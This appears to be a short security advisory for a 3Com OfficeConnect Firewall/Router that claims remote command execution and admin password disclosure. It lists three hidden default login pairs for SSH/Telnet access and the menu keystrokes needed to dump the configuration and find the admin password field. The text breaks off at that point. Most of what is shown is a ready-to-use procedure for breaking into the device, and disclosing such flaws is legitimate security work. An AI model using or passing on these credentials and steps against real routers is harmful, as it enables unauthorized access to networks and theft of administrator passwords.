| 
 | 
**************************************************************
Product: 3Com OfficeConnect Firewall/Router
Website: http://www.3com.com/ 
Discovered By: Andrea Fabrizi
Email: andrea.fabrizi@gmail.com 
Web: http://www.andreafabrizi.it 
Vuln: remote command execution and password disclosure
**************************************************************
####### Admin password disclosure #######
1) SSH/Telnet to router using one of these hidden accounts:
   support:support
   user:5
   nobody:admin
2) Type 9
3) Type 1
3) Type 3 to dump the configuration
4) Locate the sysPassword field: